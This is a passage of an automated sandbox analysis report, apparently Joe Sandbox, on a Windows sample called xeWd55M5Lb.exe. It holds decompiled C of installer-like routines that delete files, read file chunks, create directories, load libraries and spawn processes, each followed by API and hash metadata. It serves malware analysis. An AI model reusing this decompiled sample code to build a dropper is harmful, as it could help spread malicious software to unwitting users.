                                                          				}
                                                          				if(_t9 == 0) {
                                                          					if((_a8 & 0x00000004) == 0) {
                                                          						SetFileAttributesW(_t14, _t13);
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}






                                                          0x00405d2d
                                                          0x00405d38
                                                          0x00405d3d
                                                          0x00405d6d
                                                          0x00000000
                                                          0x00405d6d
                                                          0x00405d44
                                                          0x00405d45
                                                          0x00405d4f
                                                          0x00405d47
                                                          0x00405d47
                                                          0x00405d47
                                                          0x00405d57
                                                          0x00405d63
                                                          0x00405d67
                                                          0x00405d67
                                                          0x00000000
                                                          0x00405d59
                                                          0x00000000
                                                          0x00405d5b

                                                          APIs
                                                            • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                            • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                                          • String ID:
                                                          • API String ID: 1655745494-0
                                                          • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                          • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                          • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                          • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406AE0(void* __ecx, void* _a4) {
                                                          				long _v8;
                                                          				long _t6;
                                                          
                                                          				_t6 = WaitForSingleObject(_a4, 0x64);
                                                          				while(_t6 == 0x102) {
                                                          					E00406A71(0xf);
                                                          					_t6 = WaitForSingleObject(_a4, 0x64);
                                                          				}
                                                          				GetExitCodeProcess(_a4,  &_v8); // executed
                                                          				return _v8;
                                                          			}





                                                          0x00406af1
                                                          0x00406b08
                                                          0x00406afc
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b13
                                                          0x00406b1f

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                          • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CodeExitProcess
                                                          • String ID:
                                                          • API String ID: 2567322000-0
                                                          • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                          • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                          • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                          • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                          				long _v8;
                                                          				long _t21;
                                                          				long _t22;
                                                          				void* _t24;
                                                          				long _t26;
                                                          				int _t27;
                                                          				long _t28;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				long _t31;
                                                          				long _t32;
                                                          				long _t36;
                                                          
                                                          				_t21 = _a4;
                                                          				if(_t21 >= 0) {
                                                          					_t32 = _t21 +  *0x42a2b8;
                                                          					 *0x420ef4 = _t32;
                                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                          				}
                                                          				_t22 = E00403479(4);
                                                          				if(_t22 >= 0) {
                                                          					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                          					if(_t24 == 0) {
                                                          						L18:
                                                          						_push(0xfffffffd);
                                                          						goto L19;
                                                          					} else {
                                                          						 *0x420ef4 =  *0x420ef4 + 4;
                                                          						_t36 = E00403479(_a4);
                                                          						if(_t36 < 0) {
                                                          							L21:
                                                          							_t22 = _t36;
                                                          						} else {
                                                          							if(_a12 != 0) {
                                                          								_t26 = _a4;
                                                          								if(_t26 >= _a16) {
                                                          									_t26 = _a16;
                                                          								}
                                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                          								if(_t27 != 0) {
                                                          									_t36 = _v8;
                                                          									 *0x420ef4 =  *0x420ef4 + _t36;
                                                          									goto L21;
                                                          								} else {
                                                          									goto L18;
                                                          								}
                                                          							} else {
                                                          								if(_a4 <= 0) {
                                                          									goto L21;
                                                          								} else {
                                                          									while(1) {
                                                          										_t28 = _a4;
                                                          										if(_a4 >= 0x4000) {
                                                          											_t28 = 0x4000;
                                                          										}
                                                          										_v8 = _t28;
                                                          										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                          										if(_t29 == 0) {
                                                          											goto L18;
                                                          										}
                                                          										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                          										if(_t30 == 0) {
                                                          											_push(0xfffffffe);
                                                          											L19:
                                                          											_pop(_t22);
                                                          										} else {
                                                          											_t31 = _v8;
                                                          											_a4 = _a4 - _t31;
                                                          											 *0x420ef4 =  *0x420ef4 + _t31;
                                                          											_t36 = _t36 + _t31;
                                                          											if(_a4 > 0) {
                                                          												continue;
                                                          											} else {
                                                          												goto L21;
                                                          											}
                                                          										}
                                                          										goto L22;
                                                          									}
                                                          									goto L18;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L22:
                                                          				return _t22;
                                                          			}















                                                          0x00403375
                                                          0x0040337e
                                                          0x00403387
                                                          0x0040338b
                                                          0x00403396
                                                          0x00403396
                                                          0x0040339e
                                                          0x004033a5
                                                          0x004033b7
                                                          0x004033be
                                                          0x00403463
                                                          0x00403463
                                                          0x00000000
                                                          0x004033c4
                                                          0x004033c7
                                                          0x004033d3
                                                          0x004033d7
                                                          0x00403471
                                                          0x00403471
                                                          0x004033dd
                                                          0x004033e0
                                                          0x0040343f
                                                          0x00403445
                                                          0x00403447
                                                          0x00403447
                                                          0x00403459
                                                          0x00403461
                                                          0x00403468
                                                          0x0040346b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004033e2
                                                          0x004033e5
                                                          0x00000000
                                                          0x004033eb
                                                          0x004033f0
                                                          0x004033f7
                                                          0x004033fa
                                                          0x004033fc
                                                          0x004033fc
                                                          0x00403409
                                                          0x0040340c
                                                          0x00403413
                                                          0x00000000
                                                          0x00000000
                                                          0x0040341c
                                                          0x00403423
                                                          0x0040343b
                                                          0x00403465
                                                          0x00403465
                                                          0x00403425
                                                          0x00403425
                                                          0x00403428
                                                          0x0040342b
                                                          0x00403431
                                                          0x00403437
                                                          0x00000000
                                                          0x00403439
                                                          0x00000000
                                                          0x00403439
                                                          0x00403437
                                                          0x00000000
                                                          0x00403423
                                                          0x00000000
                                                          0x004033f0
                                                          0x004033e5
                                                          0x004033e0
                                                          0x004033d7
                                                          0x004033be
                                                          0x00403473
                                                          0x00403476

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                          • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                          • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                          • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E004015C1(short __ebx, void* __eflags) {
                                                          				void* _t17;
                                                          				int _t23;
                                                          				void* _t25;
                                                          				signed char _t26;
                                                          				short _t28;
                                                          				short _t31;
                                                          				short* _t34;
                                                          				void* _t36;
                                                          
                                                          				_t28 = __ebx;
                                                          				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                          				_t17 = E00405FE2(_t16);
                                                          				_t32 = _t17;
                                                          				if(_t17 != __ebx) {
                                                          					do {
                                                          						_t34 = E00405F64(_t32, 0x5c);
                                                          						_t31 =  *_t34;
                                                          						 *_t34 = _t28;
                                                          						if(_t31 != _t28) {
                                                          							L5:
                                                          							_t25 = E00405C16( *(_t36 + 8));
                                                          						} else {
                                                          							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                          							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                          								goto L5;
                                                          							} else {
                                                          								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                          							}
                                                          						}
                                                          						if(_t25 != _t28) {
                                                          							if(_t25 != 0xb7) {
                                                          								L9:
                                                          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                          							} else {
                                                          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                          								if((_t26 & 0x00000010) == 0) {
                                                          									goto L9;
                                                          								}
                                                          							}
                                                          						}
                                                          						 *_t34 = _t31;
                                                          						_t32 = _t34 + 2;
                                                          					} while (_t31 != _t28);
                                                          				}
                                                          				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                          					_push(0xfffffff5);
                                                          					E00401423();
                                                          				} else {
                                                          					E00401423(0xffffffe6);
                                                          					E00406668(0x436000,  *(_t36 + 8));
                                                          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                          					if(_t23 == 0) {
                                                          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                          					}
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                          				return 0;
                                                          			}











                                                          0x004015c1
                                                          0x004015c9
                                                          0x004015cc
                                                          0x004015d1
                                                          0x004015d5
                                                          0x004015d7
                                                          0x004015df
                                                          0x004015e1
                                                          0x004015e4
                                                          0x004015ea
                                                          0x00401604
                                                          0x00401607
                                                          0x004015ec
                                                          0x004015ec
                                                          0x004015ef
                                                          0x00000000
                                                          0x004015fa
                                                          0x004015fd
                                                          0x004015fd
                                                          0x004015ef
                                                          0x0040160e
                                                          0x00401615
                                                          0x00401624
                                                          0x00401624
                                                          0x00401617
                                                          0x0040161a
                                                          0x00401622
                                                          0x00000000
                                                          0x00000000
                                                          0x00401622
                                                          0x00401615
                                                          0x00401627
                                                          0x0040162b
                                                          0x0040162c
                                                          0x004015d7
                                                          0x00401634
                                                          0x00401663
                                                          0x004022f1
                                                          0x00401636
                                                          0x00401638
                                                          0x00401645
                                                          0x0040164d
                                                          0x00401655
                                                          0x0040165b
                                                          0x0040165b
                                                          0x00401655
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                          • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID:
                                                          • API String ID: 1892508949-0
                                                          • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                          • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                          • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                          • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E00401389(signed int _a4) {
                                                          				intOrPtr* _t6;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t12;
                                                          				signed int _t16;
                                                          				signed int _t17;
                                                          				void* _t18;
                                                          
                                                          				_t17 = _a4;
                                                          				while(_t17 >= 0) {
                                                          					_t6 = _t17 * 0x1c +  *0x42a290;
                                                          					if( *_t6 == 1) {
                                                          						break;
                                                          					}
                                                          					_push(_t6); // executed
                                                          					_t8 = E00401434(); // executed
                                                          					if(_t8 == 0x7fffffff) {
                                                          						return 0x7fffffff;
                                                          					}
                                                          					_t10 = E0040136D(_t8);
                                                          					if(_t10 != 0) {
                                                          						_t11 = _t10 - 1;
                                                          						_t16 = _t17;
                                                          						_t17 = _t11;
                                                          						_t12 = _t11 - _t16;
                                                          					} else {
                                                          						_t12 = _t10 + 1;
                                                          						_t17 = _t17 + 1;
                                                          					}
                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                          						 *0x42924c =  *0x42924c + _t12;
                                                          						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}











                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                          • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                          • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                          • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405C4B(WCHAR* _a4) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				int _t7;
                                                          
                                                          				0x426750->cb = 0x44;
                                                          				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                          				if(_t7 != 0) {
                                                          					CloseHandle(_v20.hThread);
                                                          					return _v20.hProcess;
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          0x00405c54
                                                          0x00405c74
                                                          0x00405c7c
                                                          0x00405c81
                                                          0x00000000
                                                          0x00405c87
                                                          0x00405c8b

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                          • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                          • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                          • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406A35(signed int _a4) {
                                                          				struct HINSTANCE__* _t5;
                                                          				signed int _t10;
                                                          
                                                          				_t10 = _a4 << 3;
                                                          				_t8 =  *(_t10 + 0x40a410);
                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                          				if(_t5 != 0) {
                                                          					L2:
                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                          				}
                                                          				_t5 = E004069C5(_t8); // executed
                                                          				if(_t5 == 0) {
                                                          					return 0;
                                                          				}
                                                          				goto L2;
                                                          			}





                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a47
                                                          0x00406a4f
                                                          0x00406a5b
                                                          0x00000000
                                                          0x00406a62
                                                          0x00406a52
                                                          0x00406a59
                                                          0x00000000
                                                          0x00406a6a
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                            • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                            • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                            • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                          • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                          • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                          				signed int _t5;
                                                          				void* _t6;
                                                          
                                                          				_t5 = GetFileAttributesW(_a4); // executed
                                                          				asm("sbb ecx, ecx");
                                                          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                          				return _t6;
                                                          			}





                                                          0x0040615c
                                                          0x00406169
                                                          0x0040617e
                                                          0x00406184

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 0040615C
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
